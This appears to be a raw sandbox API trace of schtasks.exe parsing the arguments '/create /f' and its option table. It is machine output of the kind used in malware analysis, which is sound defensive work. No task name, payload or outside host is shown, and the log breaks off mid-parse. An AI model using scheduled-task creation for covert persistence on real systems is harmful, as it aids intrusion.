[0170.428] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0170.428] lstrlenW (lpString="schtasks.exe") returned 12
[0170.428] lstrlenW (lpString=".EXE") returned 4
[0170.428] lstrlenW (lpString="schtasks") returned 8
[0170.428] lstrlenW (lpString="/create") returned 7
[0170.428] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.428] _vsnwprintf (in: _Buffer=0x4f5a90, _BufferCount=0x19, _Format="%s %s", _ArgList=0x13ce34 | out: _Buffer="schtasks /create") returned 16
[0170.428] _memicmp (_Buf1=0x4f4c78, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.428] GetProcessHeap () returned 0x4e0000
[0170.428] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5388
[0170.428] _memicmp (_Buf1=0x4f4c90, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.429] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x4f6728, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0170.429] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0170.429] GetProcessHeap () returned 0x4e0000
[0170.429] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x30) returned 0x4f6968
[0170.429] _vsnwprintf (in: _Buffer=0x4f6680, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x13ce38 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0170.429] GetProcessHeap () returned 0x4e0000
[0170.429] GetProcessHeap () returned 0x4e0000
[0170.429] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5ca0) returned 1
[0170.429] GetProcessHeap () returned 0x4e0000
[0170.429] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5ca0) returned 0x74e
[0170.429] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5ca0 | out: hHeap=0x4e0000) returned 1
[0170.429] SetLastError (dwErrCode=0x0)
[0170.429] GetThreadLocale () returned 0x409
[0170.429] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="create") returned 6
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="?") returned 1
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="s") returned 1
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="u") returned 1
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="p") returned 1
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="ru") returned 2
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="rp") returned 2
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="sc") returned 2
[0170.430] GetThreadLocale () returned 0x409
[0170.430] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.430] lstrlenW (lpString="mo") returned 2
[0170.430] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="d") returned 1
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="m") returned 1
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="i") returned 1
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="tn") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="tr") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="st") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="sd") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="ed") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="it") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.431] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.431] lstrlenW (lpString="et") returned 2
[0170.431] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="k") returned 1
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="du") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="ri") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="z") returned 1
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="f") returned 1
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="v1") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="xml") returned 3
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="ec") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="rl") returned 2
[0170.432] GetThreadLocale () returned 0x409
[0170.432] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.432] lstrlenW (lpString="delay") returned 5
[0170.432] GetThreadLocale () returned 0x409
[0170.433] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.433] lstrlenW (lpString="np") returned 2
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] lstrlenW (lpString="/create") returned 7
[0170.433] lstrlenW (lpString="-/") returned 2
[0170.433] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.433] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.433] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.433] lstrlenW (lpString="|create|") returned 8
[0170.433] lstrlenW (lpString="|create|") returned 8
[0170.433] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|"
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] SetLastError (dwErrCode=0x0)
[0170.433] lstrlenW (lpString="/f") returned 2
[0170.433] lstrlenW (lpString="-/") returned 2
[0170.433] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] lstrlenW (lpString="create") returned 6
[0170.433] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] lstrlenW (lpString="f") returned 1
[0170.434] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.434] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.434] lstrlenW (lpString="|create|") returned 8
[0170.434] lstrlenW (lpString="|f|") returned 3
[0170.434] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0170.434] SetLastError (dwErrCode=0x490)
[0170.434] lstrlenW (lpString="?") returned 1
[0170.434] lstrlenW (lpString="?") returned 1
[0170.434] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] lstrlenW (lpString="f") returned 1
[0170.434] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|?|") returned 3
[0170.434] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.434] lstrlenW (lpString="|?|") returned 3
[0170.434] lstrlenW (lpString="|f|") returned 3
[0170.434] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0170.434] SetLastError (dwErrCode=0x490)
[0170.434] lstrlenW (lpString="s") returned 1
[0170.434] lstrlenW (lpString="s") returned 1
[0170.434] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.434] lstrlenW (lpString="f") returned 1
[0170.435] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.435] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|s|") returned 3
[0170.435] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.435] lstrlenW (lpString="|s|") returned 3
[0170.435] lstrlenW (lpString="|f|") returned 3
[0170.435] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0170.435] SetLastError (dwErrCode=0x490)
[0170.435] lstrlenW (lpString="u") returned 1
[0170.435] lstrlenW (lpString="u") returned 1
[0170.435] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.435] lstrlenW (lpString="f") returned 1
[0170.435] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.435] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|u|") returned 3
[0170.435] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.435] lstrlenW (lpString="|u|") returned 3
[0170.435] lstrlenW (lpString="|f|") returned 3
[0170.435] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0170.435] SetLastError (dwErrCode=0x490)
[0170.435] lstrlenW (lpString="p") returned 1
[0170.435] lstrlenW (lpString="p") returned 1
[0170.435] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.435] lstrlenW (lpString="f") returned 1
[0170.435] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.436] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|p|") returned 3
[0170.436] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.436] lstrlenW (lpString="|p|") returned 3
[0170.436] lstrlenW (lpString="|f|") returned 3
[0170.436] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0170.436] SetLastError (dwErrCode=0x490)
[0170.436] lstrlenW (lpString="ru") returned 2
[0170.436] lstrlenW (lpString="ru") returned 2
[0170.436] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.436] lstrlenW (lpString="f") returned 1
[0170.436] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.436] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ru|") returned 4
[0170.436] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.436] lstrlenW (lpString="|ru|") returned 4
[0170.436] lstrlenW (lpString="|f|") returned 3
[0170.436] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0
[0170.436] SetLastError (dwErrCode=0x490)
[0170.436] lstrlenW (lpString="rp") returned 2
[0170.436] lstrlenW (lpString="rp") returned 2
[0170.436] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.436] lstrlenW (lpString="f") returned 1
[0170.436] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.437] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|rp|") returned 4
[0170.437] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.437] lstrlenW (lpString="|rp|") returned 4
[0170.437] lstrlenW (lpString="|f|") returned 3
[0170.437] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0
[0170.437] SetLastError (dwErrCode=0x490)
[0170.437] lstrlenW (lpString="sc") returned 2
[0170.437] lstrlenW (lpString="sc") returned 2
[0170.437] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.437] lstrlenW (lpString="f") returned 1
[0170.437] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.437] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sc|") returned 4
[0170.437] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.437] lstrlenW (lpString="|sc|") returned 4
[0170.437] lstrlenW (lpString="|f|") returned 3
[0170.437] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0
[0170.437] SetLastError (dwErrCode=0x490)
[0170.437] lstrlenW (lpString="mo") returned 2
[0170.437] lstrlenW (lpString="mo") returned 2
[0170.437] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.437] lstrlenW (lpString="f") returned 1
[0170.437] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|mo|") returned 4
[0170.438] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.438] lstrlenW (lpString="|mo|") returned 4
[0170.438] lstrlenW (lpString="|f|") returned 3
[0170.438] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0
[0170.438] SetLastError (dwErrCode=0x490)
[0170.438] lstrlenW (lpString="d") returned 1
[0170.438] lstrlenW (lpString="d") returned 1
[0170.438] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] lstrlenW (lpString="f") returned 1
[0170.438] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|d|") returned 3
[0170.438] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.438] lstrlenW (lpString="|d|") returned 3
[0170.438] lstrlenW (lpString="|f|") returned 3
[0170.438] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0
[0170.438] SetLastError (dwErrCode=0x490)
[0170.438] lstrlenW (lpString="m") returned 1
[0170.438] lstrlenW (lpString="m") returned 1
[0170.438] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] lstrlenW (lpString="f") returned 1
[0170.438] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.438] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|m|") returned 3
[0170.438] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.438] lstrlenW (lpString="|m|") returned 3
[0170.438] lstrlenW (lpString="|f|") returned 3
[0170.438] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0
[0170.438] SetLastError (dwErrCode=0x490)
[0170.439] lstrlenW (lpString="i") returned 1
[0170.439] lstrlenW (lpString="i") returned 1
[0170.439] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] lstrlenW (lpString="f") returned 1
[0170.439] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|i|") returned 3
[0170.439] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.439] lstrlenW (lpString="|i|") returned 3
[0170.439] lstrlenW (lpString="|f|") returned 3
[0170.439] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0
[0170.439] SetLastError (dwErrCode=0x490)
[0170.439] lstrlenW (lpString="tn") returned 2
[0170.439] lstrlenW (lpString="tn") returned 2
[0170.439] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] lstrlenW (lpString="f") returned 1
[0170.439] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.439] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.439] lstrlenW (lpString="|tn|") returned 4
[0170.439] lstrlenW (lpString="|f|") returned 3
[0170.439] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0170.439] SetLastError (dwErrCode=0x490)
[0170.439] lstrlenW (lpString="tr") returned 2
[0170.439] lstrlenW (lpString="tr") returned 2
[0170.439] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] lstrlenW (lpString="f") returned 1
[0170.439] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.439] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tr|") returned 4
[0170.440] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.440] lstrlenW (lpString="|tr|") returned 4
[0170.440] lstrlenW (lpString="|f|") returned 3
[0170.440] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0
[0170.440] SetLastError (dwErrCode=0x490)
[0170.440] lstrlenW (lpString="st") returned 2
[0170.440] lstrlenW (lpString="st") returned 2
[0170.440] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.440] lstrlenW (lpString="f") returned 1
[0170.440] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.440] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|st|") returned 4
[0170.440] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.440] lstrlenW (lpString="|st|") returned 4
[0170.440] lstrlenW (lpString="|f|") returned 3
[0170.440] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0
[0170.440] SetLastError (dwErrCode=0x490)
[0170.440] lstrlenW (lpString="sd") returned 2
[0170.440] lstrlenW (lpString="sd") returned 2
[0170.440] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.440] lstrlenW (lpString="f") returned 1
[0170.440] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.440] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sd|") returned 4
[0170.440] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.440] lstrlenW (lpString="|sd|") returned 4
[0170.440] lstrlenW (lpString="|f|") returned 3
[0170.440] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0
[0170.440] SetLastError (dwErrCode=0x490)
[0170.441] lstrlenW (lpString="ed") returned 2
[0170.441] lstrlenW (lpString="ed") returned 2
[0170.441] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.441] lstrlenW (lpString="f") returned 1
[0170.441] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.441] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ed|") returned 4
[0170.441] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.441] lstrlenW (lpString="|ed|") returned 4
[0170.441] lstrlenW (lpString="|f|") returned 3
[0170.441] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0
[0170.441] SetLastError (dwErrCode=0x490)
[0170.441] lstrlenW (lpString="it") returned 2
[0170.441] lstrlenW (lpString="it") returned 2
[0170.441] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.441] lstrlenW (lpString="f") returned 1
[0170.441] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.441] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|it|") returned 4
[0170.441] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.441] lstrlenW (lpString="|it|") returned 4
[0170.441] lstrlenW (lpString="|f|") returned 3
[0170.441] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0
[0170.441] SetLastError (dwErrCode=0x490)
[0170.441] lstrlenW (lpString="et") returned 2
[0170.441] lstrlenW (lpString="et") returned 2
[0170.442] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] lstrlenW (lpString="f") returned 1
[0170.442] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|et|") returned 4
[0170.442] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.442] lstrlenW (lpString="|et|") returned 4
[0170.442] lstrlenW (lpString="|f|") returned 3
[0170.442] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0
[0170.442] SetLastError (dwErrCode=0x490)
[0170.442] lstrlenW (lpString="k") returned 1
[0170.442] lstrlenW (lpString="k") returned 1
[0170.442] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] lstrlenW (lpString="f") returned 1
[0170.442] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|k|") returned 3
[0170.442] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.442] lstrlenW (lpString="|k|") returned 3
[0170.442] lstrlenW (lpString="|f|") returned 3
[0170.442] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0
[0170.442] SetLastError (dwErrCode=0x490)
[0170.442] lstrlenW (lpString="du") returned 2
[0170.442] lstrlenW (lpString="du") returned 2
[0170.442] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.442] lstrlenW (lpString="f") returned 1
